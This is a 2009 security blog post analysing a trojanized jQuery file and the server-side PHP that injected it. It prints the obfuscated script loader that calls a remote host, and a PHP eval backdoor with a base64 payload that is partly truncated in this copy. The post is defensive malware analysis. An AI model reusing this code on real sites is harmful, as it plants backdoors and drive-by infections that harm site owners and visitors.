Code injection from within

by David Maciejak
April 30, 2009 at 9:33 am

Recently, we stumbled upon a strange JavaScript file; at first sight, it looked like a totally legitimate, clean file. The file is named jquery.js and has all the characteristics of a genuine jQuery file. Even the header was kept:

/*
* jQuery JavaScript Library v1.3.1
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009)
* Revision: 6158
*/

jQuery is a popular JavaScript library used, as its homepage (http://jquery.com/) puts it, “to simplify HTML document traversing, event handling, animating, and Ajax interactions for rapid web development.”

But something caught our attention: an “unescape” call in this code, used to hide something:

document.write(unescape('fq%3CssoWcOTHriDpgpsoWt%20sOTHrc%3DOTHhDpgtsoWtDpgp:%2F%2F94soW%2EVV24Rp7%2E2Rp%2E19U6k5%2FneU6kwsfq%2F?iVVd%3Dfq1fq0RpZ%3E%3C%2FH5rscDpgrRpiptRp%3E').replace(/soW|VV|U6k|rV|fq|OTH|H5r|Dpg|Rp/g,"").replace(/Z/,navigator.appName.charAt(0)=='M'?'0':'1'));

The unescape argument contains junk tokens that, once stripped by the first “replace” method call, reveal the following code:

<script src=http://94.247.xxx.xxx/news/?id=10Z></script>

The second replace call checks the browser vendor through navigator.appName (Netscape or Microsoft) and replaces the ‘Z’ character in the code above with 0 or 1 depending on the result. The dynamically injected script therefore depends on the visitor's browser vendor.

Unsurprisingly, the remote script turned out to be XOR-obfuscated and embeds links to a malicious PDF file and a malicious Flash file targeting vulnerabilities that were disclosed recently. So if the third-party tools on the targeted computer were not up to date, there is a high risk that the computer will be infected after visiting this URL.

Nothing new, you will say? Perhaps. Yet what is interesting in this case is that the infection of a legitimate JavaScript file happened right on the server. Indeed, we found the PHP code used to corrupt this JavaScript file. In order to run and accomplish its malicious task, this piece of PHP code has to be uploaded to the targeted web server. Server-side PHP code injection is a relatively common attack, usually meant to push a “PHP shell” onto a server to take control of it. It is achieved via various techniques, such as remote file inclusion, image or avatar uploading, etc… There was a valuable article on PHP shells at PhishLabs some time ago.

{if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);
if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCm
RvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NGT3Njeno4ckNwaXB0Q3AlMjBzeno4cjF6YyUzRCU yRjF6JTJGOTF4NCUyRVYwbjJGTzQ3JTJFMjF4JTJFQ3AxOTUxeiUyRmpWMG5xeno4dTF6ZTF4cjJu
SnkxeCUyRTJuSmpzJTNFJTNDJTJGc2NyaVYwbnB6ejh0Rk8lM0UnKS5yZXBsYWNlKC9GT3wybkp8MXp8Q3B 8eno4fFYwbnwxeC9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('##','',$s);
if(stristr($s,'
elseif(($s1!=$s)||stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])
call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;
else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');
for($i=0;$i

This rather clever piece of PHP code essentially scans server files for 'script' tags and, once one is found, injects there the malicious piece we identified above in jquery.js, thereby turning visitors of the web server into potential zombies, cash cows, or whatever else can be done with a trojanized computer.

To put it in a nutshell, the code injection chain is the following: a cybercriminal injects PHP code into a web server, which injects JavaScript code into all local files, which injects a remote dynamic script into all visitors' browsers, which loads malicious documents, which inject Trojan files into their computers, which milk the targeted users.

Author bio: David Maciejak works as a security researcher for Fortinet. His primary role is to follow vulnerability trends and provide preventative protection to customers.

3 Responses to “Code injection from within”

  1. Great post, you have pointed out some wonderful points, I likewise believe this is a very great website.

  2. zoids toys says:

    I thus enjoyed all of this web site and I’ve saved your blog to maintain the new topics you will submit in the future.

  3. [...] extra cautious. Malicious links are coming fast and furious through layered attacks – bundled up in obfuscated javascript, or on your favorite social networking site. The core of these attacks are quite primitive, and in [...]
